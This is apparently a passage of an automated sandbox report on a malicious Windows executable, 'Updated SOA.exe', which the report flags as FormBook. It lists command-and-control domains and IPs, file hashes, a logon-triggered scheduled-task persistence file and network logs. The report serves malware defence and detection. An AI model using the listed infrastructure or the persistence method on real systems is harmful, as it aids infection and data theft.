          www.brightlifeprochoice.com | 172.67.169.11 | true | true |  | unknown
          starsspell.com | 70.40.216.229 | true | true |  | unknown
          connect.shopbase.com | 185.33.94.22 | true | true |  | unknown
          carts-amazon.com | 34.102.136.180 | true | false |  | unknown
          sunshinefamilysupport.com | 184.168.131.241 | true | true |  | unknown
          www.starsspell.com | unknown | unknown | true |  | unknown
          www.sunshinefamilysupport.com | unknown | unknown | true |  | unknown
          www.thesewhitevvalls.com | unknown | unknown | true |  | unknown
          www.newstodayupdate.com | unknown | unknown | true |  | unknown
          www.loccssol.store | unknown | unknown | true |  | unknown
          www.carts-amazon.com | unknown | unknown | true |  | unknown

                                      Contacted URLs


                                      URLs from Memory and Binaries


                                                                          Contacted IPs


                                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.2.184 | www.kutahyaescortbayanlarim.xyz | United States | 13335 | CLOUDFLARENETUS | true
185.53.177.12 | www.invetorsbank.com | Germany | 61969 | TEAMINTERNET-ASDE | true
70.40.216.229 | starsspell.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
34.102.136.180 | newstodayupdate.com | United States | 15169 | GOOGLEUS | false
185.33.94.22 | connect.shopbase.com | United Kingdom | 3214 | XTOMxTomEU | true
23.92.26.10 | www.emilfaucets.com | United States | 63949 | LINODE-APLinodeLLCUS | true
184.168.131.241 | sunshinefamilysupport.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
172.67.169.11 | www.brightlifeprochoice.com | United States | 13335 | CLOUDFLARENETUS | true

                                                                          General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 486924
Start date: 21.09.2021
Start time: 02:18:11
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 40s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Updated SOA.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/4@10/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 9.9% (good quality ratio 9%)
• Quality average: 72.7%
• Quality standard deviation: 31.5%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 239
• Number of non-executed functions: 180
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
                                                                          Warnings:
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 20.82.210.154, 80.67.82.211, 80.67.82.235
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                          • Not all processes were analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          Time | Type | Description
                                                                          02:19:11 | API Interceptor | 1x Sleep call for process: Updated SOA.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs


                                                                          Domains


                                                                          ASN


                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Updated SOA.exe.log
                                                                          Process:C:\Users\user\Desktop\Updated SOA.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.355304211458859
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                          Malicious:true
                                                                          Reputation:high, very likely benign file
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                          C:\Users\user\AppData\Local\Temp\tmp14E0.tmp
                                                                          Process:C:\Users\user\Desktop\Updated SOA.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1644
                                                                          Entropy (8bit):5.191767332740664
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBLtn:cbh47TlNQ//rydbz9I3YODOLNdq3r
                                                                          MD5:A07DA0BE4BD8AC6827721C7831B3233B
                                                                          SHA1:3040A19452B37F7450B83B7F301F10EFCB5D56AB
                                                                          SHA-256:0A8F7CFE0ED600627FA78F139F9E2BDE405D911274BAF4EE50DBA3687575A9E4
                                                                          SHA-512:05A1B572FA6D8A57051C1C72C7B71B14F4C6914D4DD04E51324B69A24FA9760484514A1484D862862DF5838CB7EDDC4393184D9435E210C33715AA50E65A7510
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                          C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe
                                                                          Process:C:\Users\user\Desktop\Updated SOA.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):833024
                                                                          Entropy (8bit):7.497880986313919
                                                                          Encrypted:false
                                                                          SSDEEP:12288:G+vLaFsmtiK5oUZ3Wj+RellamFY42oDSYlIqxRmiBlGQK:Oa+Fo/hFY4JX5RZlZK
                                                                          MD5:08098C5EF23FB87AF19A5ADBDD31324B
                                                                          SHA1:19645FC145FEAA325C5CC765BC873075A0AA7512
                                                                          SHA-256:AB4676FC90E455DA2127126BFBD1FD167328C79EDA83F686EF71DD89266825F5
                                                                          SHA-512:6D2FE361160642DFE88AD06E681931D8CD3929439A30D3C213D60489BE5CD7D2AA1B47D23B57EB60140EB6394369BC5041102552D40A93787C90A9E4E04EA0C8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                                          Reputation:low
                                                                          C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe:Zone.Identifier
                                                                          Process:C:\Users\user\Desktop\Updated SOA.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Reputation:high, very likely benign file
                                                                          Preview: [ZoneTransfer]....ZoneId=0

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.497880986313919
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:Updated SOA.exe
                                                                          File size:833024
                                                                          MD5:08098c5ef23fb87af19a5adbdd31324b
                                                                          SHA1:19645fc145feaa325c5cc765bc873075a0aa7512
                                                                          SHA256:ab4676fc90e455da2127126bfbd1fd167328c79eda83f686ef71dd89266825f5
                                                                          SHA512:6d2fe361160642dfe88ad06e681931d8cd3929439a30d3c213d60489be5cd7d2aa1b47d23b57eb60140eb6394369bc5041102552d40a93787c90a9e4e04ea0c8
                                                                          SSDEEP:12288:G+vLaFsmtiK5oUZ3Wj+RellamFY42oDSYlIqxRmiBlGQK:Oa+Fo/hFY4JX5RZlZK

                                                                          File Icon

                                                                          Icon Hash:92809ca6a6929ef2

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x49e88e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0x6148B4F0 [Mon Sep 20 16:21:04 2021 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:v4.0.30319
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]

                                                                          Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9e840 | 0x4b | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa2000 | 0x2e2f8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd2000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                                          Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x9c894 | 0x9ca00 | False | 0.855337814246 | data | 7.74077880888 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .sdata | 0xa0000 | 0x50 | 0x200 | False | 0.083984375 | data | 0.371646217526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xa2000 | 0x2e2f8 | 0x2e400 | False | 0.332648859797 | data | 5.94439881376 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xd2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

                                                                          Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_ICON | 0xa22b0 | 0x62a4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | |
| RT_ICON | 0xa8554 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512 | | |
| RT_ICON | 0xb8d7c | 0x94a8 | data | | |
| RT_ICON | 0xc2224 | 0x5488 | data | | |
| RT_ICON | 0xc76ac | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 117440512 | | |
| RT_ICON | 0xcb8d4 | 0x25a8 | data | | |
| RT_ICON | 0xcde7c | 0x10a8 | data | | |
| RT_ICON | 0xcef24 | 0x988 | data | | |
| RT_ICON | 0xcf8ac | 0x468 | GLS_BINARY_LSB_FIRST | | |
| RT_GROUP_ICON | 0xcfd14 | 0x84 | data | | |
| RT_VERSION | 0xcfd98 | 0x374 | data | | |
| RT_MANIFEST | 0xd010c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | | |

                                                                          Imports

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

                                                                          Version Infos

| Description | Data |
|---|---|
| Translation | 0x0000 0x04b0 |
| LegalCopyright | Copyright Solymosi Software 2011 |
| Assembly Version | 0.1.3.0 |
| InternalName | TypeEnt.exe |
| FileVersion | 0.1.1.0 |
| CompanyName | Solymosi Software |
| LegalTrademarks | |
| Comments | Duo Bizz Snake |
| ProductName | Duo Bizz |
| ProductVersion | 0.1.1.0 |
| FileDescription | Duo Bizz |
| OriginalFilename | TypeEnt.exe |

                                                                          Network Behavior

                                                                          Snort IDS Alerts

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 09/21/21-02:20:18.215402 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49767 | 34.102.136.180 | 192.168.2.3 |
| 09/21/21-02:20:23.281737 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.3 | 104.21.2.184 |
| 09/21/21-02:20:23.281737 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.3 | 104.21.2.184 |
| 09/21/21-02:20:23.281737 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.3 | 104.21.2.184 |
| 09/21/21-02:20:39.666773 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.3 | 184.168.131.241 |
| 09/21/21-02:20:39.666773 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.3 | 184.168.131.241 |
| 09/21/21-02:20:39.666773 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.3 | 184.168.131.241 |
| 09/21/21-02:20:44.929760 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49771 | 80 | 192.168.2.3 | 185.53.177.12 |
| 09/21/21-02:20:44.929760 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49771 | 80 | 192.168.2.3 | 185.53.177.12 |
| 09/21/21-02:20:44.929760 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49771 | 80 | 192.168.2.3 | 185.53.177.12 |
| 09/21/21-02:20:44.946695 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49771 | 185.53.177.12 | 192.168.2.3 |
| 09/21/21-02:20:50.413015 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49784 | 80 | 192.168.2.3 | 185.33.94.22 |
| 09/21/21-02:20:50.413015 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49784 | 80 | 192.168.2.3 | 185.33.94.22 |
| 09/21/21-02:20:50.413015 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49784 | 80 | 192.168.2.3 | 185.33.94.22 |
| 09/21/21-02:20:50.462430 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49784 | 185.33.94.22 | 192.168.2.3 |
| 09/21/21-02:21:11.726536 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 34.102.136.180 |
| 09/21/21-02:21:11.726536 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 34.102.136.180 |
| 09/21/21-02:21:11.726536 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 34.102.136.180 |
| 09/21/21-02:21:11.917900 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49803 | 34.102.136.180 | 192.168.2.3 |

                                                                          Network Port Distribution

                                                                          TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Sep 21, 2021 02:20:39.666444063 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:39.666773081 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:39.837649107 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:39.861923933 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:39.861970901 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:39.862287998 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:39.862422943 CEST4977080192.168.2.3184.168.131.241
                                                                          Sep 21, 2021 02:20:40.033267021 CEST8049770184.168.131.241192.168.2.3
                                                                          Sep 21, 2021 02:20:44.895415068 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.912771940 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.912903070 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.929626942 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.929759979 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.946661949 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.946695089 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.946712971 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:44.946875095 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.946928024 CEST4977180192.168.2.3185.53.177.12
                                                                          Sep 21, 2021 02:20:44.964370012 CEST8049771185.53.177.12192.168.2.3
                                                                          Sep 21, 2021 02:20:50.394264936 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.412487030 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.412758112 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.413014889 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.430296898 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462430000 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462472916 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462511063 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462555885 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462614059 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462650061 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462650061 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462690115 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462692976 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462728024 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462728024 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462776899 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462779999 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462810040 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462836027 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462862015 CEST8049784185.33.94.22192.168.2.3
                                                                          Sep 21, 2021 02:20:50.462897062 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462913036 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:50.462949991 CEST4978480192.168.2.3185.33.94.22
                                                                          Sep 21, 2021 02:20:55.532609940 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.550123930 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.550256014 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.550383091 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.567588091 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.697921038 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.697942972 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.698059082 CEST8049801172.67.169.11192.168.2.3
                                                                          Sep 21, 2021 02:20:55.698138952 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.698189974 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:20:55.698249102 CEST4980180192.168.2.3172.67.169.11
                                                                          Sep 21, 2021 02:21:05.995961905 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:06.154270887 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:06.154429913 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:06.154762030 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:06.312954903 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:06.648921967 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:06.848128080 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:07.205437899 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:07.205759048 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:07.205770969 CEST804980270.40.216.229192.168.2.3
                                                                          Sep 21, 2021 02:21:07.205905914 CEST4980280192.168.2.370.40.216.229
                                                                          Sep 21, 2021 02:21:11.701520920 CEST4980380192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:21:11.726345062 CEST804980334.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:21:11.726453066 CEST4980380192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:21:11.726536036 CEST4980380192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:21:11.751239061 CEST804980334.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:21:11.917900085 CEST804980334.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:21:11.917968988 CEST804980334.102.136.180192.168.2.3
                                                                          Sep 21, 2021 02:21:11.918134928 CEST4980380192.168.2.334.102.136.180
                                                                          Sep 21, 2021 02:21:11.943341017 CEST804980334.102.136.180192.168.2.3

                                                                          UDP Packets


                                                                          DNS Queries

                                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                          Sep 21, 2021 02:20:17.970813036 CEST | 192.168.2.3 | 8.8.8.8 | 0xcd4b | Standard query (0) | www.carts-amazon.com | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:23.232652903 CEST | 192.168.2.3 | 8.8.8.8 | 0x538b | Standard query (0) | www.kutahyaescortbayanlarim.xyz | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:28.748796940 CEST | 192.168.2.3 | 8.8.8.8 | 0x30d8 | Standard query (0) | www.emilfaucets.com | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:39.469809055 CEST | 192.168.2.3 | 8.8.8.8 | 0x4de9 | Standard query (0) | www.sunshinefamilysupport.com | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:44.869060993 CEST | 192.168.2.3 | 8.8.8.8 | 0x5696 | Standard query (0) | www.invetorsbank.com | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:49.968334913 CEST | 192.168.2.3 | 8.8.8.8 | 0x6816 | Standard query (0) | www.loccssol.store | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:55.506264925 CEST | 192.168.2.3 | 8.8.8.8 | 0xc70a | Standard query (0) | www.brightlifeprochoice.com | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:21:00.719315052 CEST | 192.168.2.3 | 8.8.8.8 | 0x9951 | Standard query (0) | www.thesewhitevvalls.com | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:21:05.873550892 CEST | 192.168.2.3 | 8.8.8.8 | 0x8e49 | Standard query (0) | www.starsspell.com | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:21:11.666320086 CEST | 192.168.2.3 | 8.8.8.8 | 0x9195 | Standard query (0) | www.newstodayupdate.com | A (IP address) | IN (0x0001)

                                                                          DNS Answers

                                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                          Sep 21, 2021 02:20:18.003947973 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd4b | No error (0) | www.carts-amazon.com | carts-amazon.com | | CNAME (Canonical name) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:18.003947973 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd4b | No error (0) | carts-amazon.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
